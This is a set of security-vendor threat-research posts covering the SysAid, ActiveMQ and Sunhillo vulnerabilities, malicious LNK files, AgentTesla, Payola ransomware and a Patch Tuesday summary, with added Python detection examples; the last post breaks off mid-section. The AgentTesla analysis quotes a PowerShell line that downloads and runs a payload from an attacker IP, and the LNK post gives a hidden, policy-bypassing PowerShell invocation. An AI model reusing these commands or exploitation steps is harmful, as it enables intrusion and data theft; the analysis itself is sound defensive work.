Posts

SysAid Path Traversal Vulnerability

Overview

SonicWall Capture Labs Threat Research Team became aware of the SysAid path traversal vulnerability, assessed its impact and developed mitigation measures for the vulnerability. On November 8, 2023, SysAid, an IT service management company, disclosed CVE-2023-47246, a zero-day path traversal vulnerability carrying a CVSS score of 9.8 and affecting on-premise SysAid servers running versions earlier than 23.3.36. According to Microsoft’s threat intelligence team and SysAid’s advisory, it has been exploited in the wild by Lace Tempest (DEV-0950 / TA-505), and SonicWall is also currently seeing an increasing number of active exploitation attempts. This is the same threat actor responsible for exploiting the MOVEit file transfer tool vulnerability, and it is associated with the ransomware group known as "CL0P". To mitigate this vulnerability, SysAid has released a patch, which is included in version 23.3.36.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-47246.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is high.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Technical Overview

This path traversal vulnerability allows for threat actors to upload a malicious WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service through a POST request. The attacker can then request the web shell by browsing to the URL where it now resides to gain access to the server.

Triggering the Vulnerability

The vulnerability exists within the doPost method of the SysAid com.ilient.server.UserEntry class. The accountID parameter of this request is susceptible to path injection because it is passed directly to the File constructor. By decompiling the Java code, it is possible to see the accountID parameter being saved into a string variable named convertParameter, as shown in Figure 1.

Figure 1: doPost method parsing accountID

convertParameter is then stored in a variable that is passed to the File constructor, as shown in Figure 2. For readability, the variable has been renamed accountIDParameter.

Figure 2: accountID being used to create a file

The path dictated in the accountID parameter is the location where the data in the body of the POST request will be written. Therefore, to trigger and leverage this vulnerability the attacker needs to send a POST request to the server with the accountID parameter set to where the data in the body of the post request should be written.
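The check the doPost method lacks, as an added Python example (not SysAid's Java and not taken from the advisory): the first function reproduces the defect the write-up describes, a request parameter joined straight into a file path, and the second accepts only a bare identifier and then confirms that the resolved path still lies under the data directory. The web-root path, the accounts directory and the function names are assumptions made for the illustration, not the product's layout.

```python
import os
from pathlib import Path

# Assumed layout for the illustration; not SysAid's real directory structure.
WEBROOT = "/srv/app/webroot"
DATA_DIR = os.path.join(WEBROOT, "accounts")


def vulnerable_target_path(account_id: str) -> str:
    """The defect pattern from the write-up: the request parameter is joined
    into a file path as-is, so '..' segments (and absolute paths, which
    os.path.join honours) let the caller choose any location on disk.
    Returned for inspection only; nothing is written."""
    return os.path.normpath(os.path.join(DATA_DIR, account_id))


def escapes_data_dir(path: str) -> bool:
    """True when the fully resolved path lies outside DATA_DIR."""
    base = Path(DATA_DIR).resolve()
    candidate = Path(path).resolve()
    return candidate != base and base not in candidate.parents


def safe_target_path(account_id: str) -> str:
    """Hardened version: an identifier may only contain [A-Za-z0-9_-], and the
    resolved path must still be inside DATA_DIR (defence in depth against
    symlinks or encodings the first check did not anticipate)."""
    if (not account_id or not account_id.isascii()
            or not all(c.isalnum() or c in "-_" for c in account_id)):
        raise ValueError(f"rejected account id {account_id!r}")
    target = str((Path(DATA_DIR) / account_id).resolve())
    if escapes_data_dir(target):
        raise ValueError(f"path escapes data directory: {target}")
    return target


def rejected(account_id: str) -> bool:
    """Convenience wrapper: does the hardened check refuse this value?"""
    try:
        safe_target_path(account_id)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # Constructed parameter values: one legitimate, two traversal attempts.
    for value in ("acct-42", "../ROOT/dropped.war", "/etc/passwd"):
        unsafe = vulnerable_target_path(value)
        print(f"{value!r:22} vulnerable -> {unsafe} (escapes: {escapes_data_dir(unsafe)})")
        print(f"{'':22} hardened   -> {'rejected' if rejected(value) else safe_target_path(value)}")
```

The syntactic check alone would already stop this case; the containment check is kept because it is the one that survives when the identifier grammar is later loosened or the value arrives through a different decoding path.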

Exploitation

Threat actors have been seen successfully exploiting this vulnerability by uploading a WAR archive that contains a web shell into the webroot of the SysAid Tomcat web service. This is accomplished by sending a POST request with a zlib-compressed WAR file containing the web shell as the request body, with the accountID parameter injected with the webroot directory. The threat actor then executes the web shell and gains access to the system by navigating to the location injected into the accountID parameter.

Post-Exploitation

After gaining a web shell through the SysAid vulnerability, threat actors were seen leveraging two PowerShell scripts to carry out post-exploitation activities. The first is used to launch a malware loader named user.exe, which loads the GraceWire trojan and injects it into Windows processes such as spoolsv.exe. Following the GraceWire deployment, a second PowerShell script is used to erase evidence of the attacker’s actions, including cleaning the SysAid on-prem server web logs. Figure 3 below shows the complete attack chain as presented by Zscaler.

Figure 3: Zscaler’s suspected exploit chain

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

  • Attempted Exploitation – IPS:4172 SysAid On-Prem Software Directory Traversal
  • Known Post Exploitation – SPY: 500 Malformed-ps1 ps1.OT_1
  • Known Post Exploitation – SPY: 501 Malformed-ps1 ps1.OT_2

Threat Graph

SonicWall sensors have confirmed active exploitation of this vulnerability. The graph in Figure 4 indicates an increasing number of exploitation attempts, and we expect exploitation to continue to increase.

Figure 4: SonicWall IPS 4172 Threat Graph

Remediation Recommendations

SysAid has released an update to patch the vulnerability, and it is strongly recommended to update to version 23.3.36 if running a SysAid On-Prem server. The SysAid advisory has also published relevant IOCs and recommendations to identify any system compromise.

Relevant Links

Malicious LNK Files Use PowerShell to Deliver Payload

Overview

This week, the SonicWall Capture Labs Research team has observed an increase in shortcut-based (LNK) malware. These seemingly legitimate LNK files execute PowerShell commands to download malware from a remote server.

Infection Cycle

The malware sample arrives as a file with a .lnk file extension and may use the following names:

  • New product Reebok 2023.lnk
  • Income and benefits – UNIQLO 2023.lnk
  • Requirements and responsibilities – UNIQLO 2023.lnk
  • LAST STUDIO List new product 2023.lnk
  • Last Studio 2023 New Arrivals Campaign Contract.lnk

Executing the .lnk file runs an instance of powershell.exe in the background. PowerShell is built into Windows and is a scripting language mostly used to automate administrative tasks.

The script is base64 encoded, and when decoded, it shows that its main purpose is to download additional files from a remote server.

Figure 1: Command line

The script is executed without the user’s knowledge, using the following options when running PowerShell:

powershell.exe -NoLogo -NoProfile -WindowStyle hidden -ExecutionPolicy bypass -EncodedCommand
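Triage of a command line like the one above, as an added Python example that is not part of the original post: it recognises the switch spellings and short aliases that powershell.exe accepts, flags the hidden-window, policy-bypass and encoded-command combination, and decodes the -EncodedCommand argument (base64 of the UTF-16LE script text) so an analyst can read it without running it. The sample command line is constructed around a harmless script, and the function names are this example's own.

```python
import base64
from typing import Optional

# Spellings powershell.exe accepts for the switches of interest, lower-cased.
# -enc is the common unambiguous-prefix abbreviation seen next to the full name.
SWITCHES = {
    "encodedcommand": ("-encodedcommand", "-enc", "-ec", "-e"),
    "executionpolicy": ("-executionpolicy", "-ex", "-ep"),
    "windowstyle": ("-windowstyle", "-w"),
    "noprofile": ("-noprofile", "-nop"),
    "nologo": ("-nologo", "-nol"),
}


def encode_command(script: str) -> str:
    """Build the -EncodedCommand form of a script. Used here only to construct
    a benign sample; it is the encoding PowerShell itself documents."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(argument: str) -> Optional[str]:
    """Reverse the encoding; None when the argument is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(argument, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _switch_name(token: str) -> Optional[str]:
    t = token.lower()
    if t.startswith("/"):            # powershell.exe also accepts /switch
        t = "-" + t[1:]
    for name, spellings in SWITCHES.items():
        if t in spellings:
            return name
    return None


def triage_powershell_cmdline(cmdline: str) -> dict:
    """Return the indicators found in a powershell.exe command line.
    Whitespace splitting is enough for this shape of command line; a full
    tool would honour quoting."""
    tokens = cmdline.split()
    found = {"hidden_window": False, "policy_bypass": False,
             "no_profile": False, "encoded": False, "decoded_command": None}
    for i, token in enumerate(tokens):
        name = _switch_name(token)
        value = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if name == "windowstyle" and value == "hidden":
            found["hidden_window"] = True
        elif name == "executionpolicy" and value in ("bypass", "unrestricted"):
            found["policy_bypass"] = True
        elif name == "noprofile":
            found["no_profile"] = True
        elif name == "encodedcommand" and value:
            found["encoded"] = True
            found["decoded_command"] = decode_encoded_command(tokens[i + 1])
    found["score"] = sum(int(found[k]) for k in
                         ("hidden_window", "policy_bypass", "no_profile", "encoded"))
    return found


# Constructed sample: the switch pattern from the write-up around a harmless script.
SAMPLE_CMDLINE = ("powershell.exe -NoLogo -NoProfile -WindowStyle hidden "
                  "-ExecutionPolicy bypass -EncodedCommand "
                  + encode_command("Write-Host 'sample'"))

if __name__ == "__main__":
    for key, val in triage_powershell_cmdline(SAMPLE_CMDLINE).items():
        print(f"{key:16} {val}")
```

The score is deliberately crude: a single -NoProfile is routine in scheduled tasks, so the useful signal is the combination, and the decoded script is what an analyst should read next.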

Meanwhile, an image file is launched and shows a picture of a product. In the screenshot below, an image of what seems like a Reebok-branded outfit is shown when executing the malicious LNK file named “New product Reebok 2023.lnk”.

Figure 2: Reebok outfit

During our analysis, a file named svczHost.exe was downloaded in \Windows\Temp.

Figure 3: Powershell.exe connecting to a remote host to download a file which was saved into %temp% directory as svczHost.exe

This then further downloaded another file named MyRdpService.exe in the same directory.

Figure 4: SvczHost.exe connecting to a remote host and downloading an additional component file that was later written into %temp% directory as myRdpService.exe

As seen in Figures 5 and 6, MyRdpService.exe was constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 5: MyRdpService.exe constantly seen connecting to a remote command and control server, sending and receiving data.

Figure 6: Encrypted packet sent to remote C&C by MyRdpService.exe

Figure 7 shows a log file named logrdp.txt that was created and looks like a connection log. Interestingly, the log file contains some text in Vietnamese.

Figure 7: Log file

We have seen an increasing amount of malicious LNK files used by cybercriminals to deliver payloads. These Windows shortcut files can contain malicious code that abuses legitimate Windows system tools, which is a simple way for criminals to evade detection.

SonicWall Protections

SonicWall Capture Labs provides protection against this threat via the following signatures:

  • GAV: Suspicious#powershell.steal (Trojan)
  • GAV: Infostealer.AIL (Trojan)

This threat is also detected by SonicWALL Capture ATP with RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for November 2023

Overview

Microsoft’s November 2023 Patch Tuesday has 57 vulnerabilities, and 15 of them are remote code execution vulnerabilities. The vulnerabilities can be classified into the following categories:

  • 17 Elevation of Privilege Vulnerabilities
  • 5 Security Feature Bypass Vulnerabilities
  • 15 Remote Code Execution Vulnerabilities
  • 6 Information Disclosure Vulnerabilities
  • 5 Denial of Service Vulnerabilities
  • 9 Spoofing Vulnerabilities

Figure 1: A pie chart breaking down the vulnerabilities by category.

The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of November 2023 and has produced coverage for six of the reported vulnerabilities.

Vulnerabilities with Detections

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability   ASPY 505 Exploit-exe exe.MP_351
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability   ASPY 506 Exploit-exe exe.MP_352
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability   ASPY 504 Exploit-exe exe.MP_350
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability   ASPY 503 Exploit-exe exe.MP_349
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability   ASPY 507 Malformed-docx docx.MP_10
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability   ASPY 502 Exploit-exe exe.MP_348

Remote Code Execution Vulnerabilities

CVE-2023-36017   Windows Scripting Engine Memory Corruption Vulnerability
CVE-2023-36028   Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
CVE-2023-36041   Microsoft Excel Remote Code Execution Vulnerability
CVE-2023-36045   Microsoft Office Graphics Remote Code Execution Vulnerability
CVE-2023-36393   Windows User Interface Application Core Remote Code Execution Vulnerability
CVE-2023-36396   Windows Compressed Folder Remote Code Execution Vulnerability
CVE-2023-36397   Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability
CVE-2023-36401   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36402   Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2023-36423   Microsoft Remote Registry Service Remote Code Execution Vulnerability
CVE-2023-36425   Windows Distributed File System (DFS) Remote Code Execution Vulnerability
CVE-2023-36437   Azure DevOps Server Remote Code Execution Vulnerability
CVE-2023-36439   Microsoft Exchange Server Remote Code Execution Vulnerability
CVE-2023-38151   Microsoft Host Integration Server 2020 Remote Code Execution Vulnerability
CVE-2023-38177   Microsoft SharePoint Server Remote Code Execution Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2023-36033   Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2023-36036   Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2023-36047   Windows Authentication Elevation of Privilege Vulnerability
CVE-2023-36049   .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability
CVE-2023-36394   Windows Search Service Elevation of Privilege Vulnerability
CVE-2023-36399   Windows Storage Elevation of Privilege Vulnerability
CVE-2023-36400   Windows HMAC Key Derivation Elevation of Privilege Vulnerability
CVE-2023-36403   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36405   Windows Kernel Elevation of Privilege Vulnerability
CVE-2023-36407   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36408   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36422   Microsoft Windows Defender Elevation of Privilege Vulnerability
CVE-2023-36424   Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2023-36427   Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2023-36558   ASP.NET Core – Security Feature Bypass Vulnerability
CVE-2023-36705   Windows Installer Elevation of Privilege Vulnerability
CVE-2023-36719   Microsoft Speech Application Programming Interface (SAPI) Elevation of Privilege Vulnerability

Denial of Service Vulnerabilities

CVE-2023-36038   ASP.NET Core Denial of Service Vulnerability
CVE-2023-36042   Visual Studio Denial of Service Vulnerability
CVE-2023-36046   Windows Authentication Denial of Service Vulnerability
CVE-2023-36392   DHCP Server Service Denial of Service Vulnerability
CVE-2023-36395   Windows Deployment Services Denial of Service Vulnerability

Information Disclosure Vulnerabilities

CVE-2023-36043   Open Management Infrastructure Information Disclosure Vulnerability
CVE-2023-36052   Azure CLI REST Command Information Disclosure Vulnerability
CVE-2023-36398   Windows NTFS Information Disclosure Vulnerability
CVE-2023-36404   Windows Kernel Information Disclosure Vulnerability
CVE-2023-36406   Windows Hyper-V Information Disclosure Vulnerability
CVE-2023-36428   Microsoft Local Security Authority Subsystem Service Information Disclosure Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2023-36021   Microsoft On-Prem Data Gateway Security Feature Bypass Vulnerability
CVE-2023-36025   Windows SmartScreen Security Feature Bypass Vulnerability
CVE-2023-36037   Microsoft Excel Security Feature Bypass Vulnerability
CVE-2023-36413   Microsoft Office Security Feature Bypass Vulnerability
CVE-2023-36560   ASP.NET Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2023-36007   Microsoft Send Customer Voice survey from Dynamics 365 Spoofing Vulnerability
CVE-2023-36016   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36018   Visual Studio Code Jupyter Extension Spoofing Vulnerability
CVE-2023-36030   Microsoft Dynamics 365 Sales Spoofing Vulnerability
CVE-2023-36031   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
CVE-2023-36035   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36039   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36050   Microsoft Exchange Server Spoofing Vulnerability
CVE-2023-36410   Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

AgentTesla Updates Its Infection Chain

The SonicWall Capture Labs Threat Research team has observed the AgentTesla infostealer being deployed using image (.jpg) files for the last few months. We have observed multiple ZIP files with titles in European languages. Different IPs were seen targeting European nations with the AgentTesla stealer and other bots having a wide variety of capabilities.

Figure 1: Infection Chain

The initial infection vector is an email with a ZIP file as an attachment. Inside the ZIP file there is a VBS script which is highly obfuscated, needing some heavy de-obfuscation to extract the next stage. The VBS on execution decodes the PowerShell code below:

Figure 2: PowerShell Script

This PowerShell then downloads an image file Rump_vbs.jpg from the URL: "hxxps://uploaddeimagens[.]com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937".

Figure 3: Image file embedded with DLL

The PowerShell retrieves a base64 encoded DotNet DLL file from the image file which is embedded between marker tags "BASE64_START" and "BASE64_END". This data is decoded and the DotNet assembly is then loaded into memory.


Figure 4: Image marker tags
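A scanner for the marker-tag trick described above, added here as a Python example (not SonicWall's or the malware's code): it locates the BASE64_START/BASE64_END pair inside a file, decodes what lies between the tags without loading or running it, and reports the size, a PE-header check and the SHA-256 so the finding can be matched against IOC lists. The image bytes and the stand-in payload are constructed for the demonstration.

```python
import base64
import hashlib
from typing import Optional

START_TAG = b"BASE64_START"
END_TAG = b"BASE64_END"


def find_embedded_payload(data: bytes) -> Optional[dict]:
    """Locate a base64 blob bracketed by the marker tags and describe it.
    Returns None when no complete tag pair is present. The decoded bytes are
    hashed and inspected, never written to disk or executed."""
    start = data.find(START_TAG)
    if start < 0:
        return None
    end = data.find(END_TAG, start + len(START_TAG))
    if end < 0:
        return None
    # Drop any whitespace or line breaks the embedding tool put around the blob.
    blob = b"".join(data[start + len(START_TAG):end].split())
    report = {"offset": start, "b64_length": len(blob), "decoded": False}
    try:
        payload = base64.b64decode(blob, validate=True)
    except ValueError:
        return report                      # tags present but contents not base64
    report.update(
        decoded=True,
        payload_size=len(payload),
        is_pe=payload[:2] == b"MZ",        # DOS/PE header, as a .NET DLL would have
        sha256=hashlib.sha256(payload).hexdigest(),
    )
    return report


def scan_file(path: str) -> Optional[dict]:
    """Run the check over a file on disk (image, archive member, anything)."""
    with open(path, "rb") as fh:
        return find_embedded_payload(fh.read())


# Constructed sample: JPEG start/end markers around a fake embedded DLL.
SAMPLE_PAYLOAD = b"MZ" + b"\x00" * 62 + b"constructed stand-in, not a real binary"
SAMPLE_IMAGE = (b"\xff\xd8\xff\xe0" + b"JFIF-ish filler " * 4
                + START_TAG + b"\n" + base64.b64encode(SAMPLE_PAYLOAD) + b"\n" + END_TAG
                + b"\xff\xd9")

if __name__ == "__main__":
    print(find_embedded_payload(SAMPLE_IMAGE))
```

Because the tags are plain ASCII the same logic translates directly into a YARA rule; the Python version adds the decode step so the hash of the hidden assembly, not just the carrier image, can be shared.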

After that, the PowerShell loads the decoded Fiber.dll, whose method "VAI" downloads and executes a base64 encoded DotNet executable from the URL: "hxxp://79.110.48[.]52/kenjkt.txt".

This is done using: "$method = $type.GetMethod(‘VAI’).Invoke($null, [object[]] (‘txt.tkjnek/25.84.011[.]97//:ptth’ , ‘dfdfd’ , ‘dfdf’ , ‘dfdf’ , ‘dadsa’ , ‘de’ , ‘cu’))".

The downloaded Fiber.dll is again a heavily obfuscated DotNet assembly and has obfuscated API strings for process injection. Although it has a number of methods, a majority of the methods inside the file have junk code.


Figure 5: Obfuscated API names for Process Injection

AgentTesla

For a long time, AgentTesla has been known for its wide variety of stealing and logging capabilities.
The txt file hosted at the URL "hxxp://79.110.48[.]52/kenjkt.txt" contains base64 encoded data. The decoded DotNet executable is the AgentTesla payload. First, it enumerates all of the Chromium-based and Mozilla-based browsers for the sensitive data they store.


Figure 6: Chromium-based browser’s data

Next, it appears that the malware has methods to search for Mozilla login data including the username and passwords in the victim’s machine.

Figure 7: Mozilla logins

Furthermore, it has functionality to retrieve sensitive credentials stored using Windows Vault GUIDs.

Figure 8: Win Vault GUIDS

AgentTesla does have keyboard hooking, clipboard hooking and logging functionality. Additionally, it has multiple APIs to retrieve keyboard layout and other details as well as information related to Windows and other system information.

Figure 9: System information APIs

The stealer also has a list of sensitive strings, or smart words, used to locate an individual’s private and sensitive information. In addition, it checks for various email clients, common database management and FTP software, and a few other well-known applications.


Figure 10: SmartWords and Telegram bot

The collected data is then exfiltrated via a Telegram bot.

Evidence of detection by SonicWall’s RTDMI™ engine can be seen below in the Capture ATP report for this file:

Figure 11: RTDMI ATP report results

IOCs:

SHA256:
9346658f9a881fa08edcf2d4071ae99f71ada25fbdcad0eaf7dfb204c5867a0d
0f6b26bc3cad49b68ab669c5d9def97db345f6c23b8d0ee9cff48262c2db0743
60304a8c52b10cd71bcc76f8a3ad0f0bbfe7395d2c64833400ac06d3c2c81d58
01ec36cf3833166dbad8aeef0c5683905b31956a5d5367ac52fa7aee2be9c64e

URLs:

  • hxxp://79.110.48[.]52/kenjkt.txt
  • hxxps://uploaddeimagens.com[.]br/images/004/616/609/original/rump_vbs.jpg?1695408937

Apache ActiveMQ Remote Code Execution (CVE-2023-46604)

Overview

The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol, causing the broker to instantiate any class on the classpath. The vulnerability is categorized as unbounded deserialization, leaving ActiveMQ open to remote code execution (RCE). This issue has a CVSS base score of 10.0. CVE-2023-46604 is an unauthenticated deserialization vulnerability in ActiveMQ’s OpenWire transport connector, which is enabled by default and impacts both “Classic” and Artemis clients and brokers. Vulnerable software versions include:

  • Apache ActiveMQ 5.18.0 before 5.18.3
  • Apache ActiveMQ 5.17.0 before 5.17.6
  • Apache ActiveMQ 5.16.0 before 5.16.7
  • Apache ActiveMQ before 5.15.16
  • Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
  • Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
  • Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
  • Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16

Organizations still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-46604.

The overall CVSS 3.1 score is 10 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H).

Base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is changed.
  • Impact of this vulnerability on data confidentiality is low.
  • Impact of this vulnerability on data integrity is high.
  • Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  • The exploit code maturity level of this vulnerability is proof of concept code.
  • The remediation level of this vulnerability is official fix.
  • The report confidence level of this vulnerability is confirmed.

Technical Overview

Apache ActiveMQ is a widely used open-source message broker written in Java, known for its multi-protocol compatibility. It offers clients the flexibility of choosing from a variety of programming languages and platforms, with support for JavaScript, C, C++, Python, .Net and others.

An attacker connected to the OpenWire TCP port 61616 can send an OpenWire packet that unmarshals an ExceptionResponse object instance. By supplying an arbitrary class name together with an arbitrary string parameter to BaseDataStreamMarshaller.createThrowable, the attacker can have an arbitrary class instantiated with a single command-string parameter.

Exploitation

At SonicWall Capture Labs Threat Research, we have recreated the PoC using the Metasploit framework, as demonstrated in Figure 1.

Before exploitation can occur, the following conditions must be true:

  • The attacker must have network access.
  • The attacker must send a manipulated OpenWire “command” (used to instantiate an arbitrary class on the classpath with a String parameter).
  • A class must be present on the installation in the classpath which can execute arbitrary code simply by instantiating it with a String parameter.

Figure 1 below demonstrates the following steps to exploit this vulnerability:

  • Create and start a vulnerable victim server.
  • Use a Metasploit module to host the poc.xml file on the attacker’s server.
  • Finally, run the exploit by running Exploit.java.

Additionally, using a Shodan dork we can observe over 6,000 vulnerable servers exposed on the internet.

Figure 1: SonicWall Capture Labs Threat Research Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS:15940 – Apache ActiveMQ OpenWire Protocol Insecure Deserialization

Threat Graphs

SonicWall sensors have confirmed active exploitation of this vulnerability. The graphs below indicate an increasing number of exploitation attempts, and we expect exploitation to continue to increase.

Figure 2: Threat Graph

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade to version 5.15.16, 5.16.7, 5.17.6 or 5.18.3, which fixes this issue.

If that is not possible, users can mitigate the issue by validating the provided throwable class type in the OpenWire marshallers that handle OpenWire commands. Further mitigation steps are described in the official advisory.

Relevant Links

Payola ransomware operator demands remote access to PC

The SonicWall threat research team has recently been tracking a new ransomware family called Payola. This family of ransomware appeared in late August 2023. It is written in .NET and is easy to analyze, as it contains no obfuscation. Early variants would append ".Payola" to the names of encrypted files, but the current variants use 5 random alphanumeric characters. During a direct conversation with the malware operator, remote access to our system was requested in order to retrieve files.

Infection Cycle:

The malware uses the following icon:

Upon execution, the following message is shown on the desktop background:

Files on the system are encrypted. Each encrypted file is given a 5-character alphanumeric extension appended to its name, e.g. image.jpg.PTebc.

The following registry entry is made:

  • HKCU\Microsoft\Windows\CurrentVersion\Run Readme {run location}

A file named README.html is dropped into directories where files were encrypted. It contains the following message:
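Two indicators from the infection cycle above turned into detection logic, as an added Python example that is not from the original post: one heuristic flags a directory in which most files carry an extra five-character alphanumeric extension next to a README.html, the other parses a .reg export of the HKCU Run key and reports a value named Readme. Both the directory listing and the registry export are constructed samples; the sample export spells out the full HKCU\Software\Microsoft\Windows\CurrentVersion\Run path of the key, and the executable name in it is a placeholder.

```python
import re
from typing import Dict, List

# name.ext.XXXXX: a normal extension followed by five appended alphanumerics.
RENAMED_RE = re.compile(r"^.+\.[A-Za-z0-9]{1,10}\.(?P<tag>[A-Za-z0-9]{5})$")
NOTE_NAME = "readme.html"
RUN_KEY = r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]"


def classify_directory(filenames: List[str], min_renamed: int = 3,
                       min_ratio: float = 0.5) -> dict:
    """Flag a directory whose contents look like Payola's output: a ransom
    note plus a majority of files carrying the five-character suffix. The
    thresholds keep a lone backup such as notes.txt.bak12 from triggering."""
    renamed = [f for f in filenames if RENAMED_RE.match(f)]
    has_note = any(f.lower() == NOTE_NAME for f in filenames)
    candidates = len(filenames) - (1 if has_note else 0)
    ratio = len(renamed) / candidates if candidates else 0.0
    return {"renamed": renamed, "has_note": has_note, "ratio": round(ratio, 2),
            "suspicious": has_note and len(renamed) >= min_renamed and ratio >= min_ratio}


def run_key_values(reg_export: str) -> Dict[str, str]:
    """Return value name -> command for the HKCU Run key in a .reg export.
    .reg files double every backslash inside string data; undo that."""
    values: Dict[str, str] = {}
    in_run_key = False
    for line in reg_export.splitlines():
        line = line.strip()
        if line.startswith("["):
            in_run_key = line == RUN_KEY
            continue
        m = re.match(r'^"([^"]+)"="(.*)"$', line)
        if in_run_key and m:
            values[m.group(1)] = m.group(2).replace("\\\\", "\\")
    return values


def suspicious_run_entries(reg_export: str) -> List[str]:
    """Payola registers its run entry under the value name 'Readme'."""
    return [name for name in run_key_values(reg_export) if name.lower() == "readme"]


# Constructed samples.
SAMPLE_LISTING = ["README.html", "image.jpg.PTebc", "budget.xlsx.PTebc",
                  "notes.txt.PTebc", "letter.docx.PTebc", "desktop.ini"]
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"
"Readme"="C:\\Users\\user\\AppData\\Roaming\\placeholder_sample.exe"
"""

if __name__ == "__main__":
    print(classify_directory(SAMPLE_LISTING))
    print(suspicious_run_entries(SAMPLE_REG))
```

Neither heuristic identifies the family on its own; together with the GAV signature below they give an endpoint or file-server monitor something to alert on while the encryption is still in progress.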

The code is written in .NET and is trivial to decompile. We can easily see its main function and the intended program flow:

The RSA public key and salt values can be seen:

The malware contains a list of programs that will be killed if running:

A list of targeted directories and file types is included in the code:

We followed the instructions in the ransom note and got in touch with the operator. We had the following conversation via email where the operator demanded remote access to our system using Anydesk:

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: Payola.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Sunhillo SureLine Command Injection Vulnerability

Overview

The SonicWall Capture Labs Threat Research team has analyzed honeypot data which reveals that attackers are actively exploiting an old vulnerability found in Sunhillo SureLine devices. They are specifically taking advantage of a command injection flaw within these devices. The Sunhillo SureLine software is designed to further process surveillance data such as format conversion and data filtering as it is transported in real time.

A critical vulnerability identified as CVE-2021-36380 with a CVSS score of 9.8 was discovered in the Sunhillo SureLine software application. The vulnerability is an unauthenticated operating system (OS) command injection flaw, which could allow an attacker to execute arbitrary commands with root privileges. This could lead to a complete compromise of the target system, enabling the attacker to cause a denial of service or establish persistence on the network. To mitigate this vulnerability, it is strongly recommended that users update Sunhillo SureLine software to at least version 8.7.0.1.1, as SonicWall is seeing an increasing number of exploitation attempts in the wild.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-36380.

The overall CVSS score is 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

Base score is 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
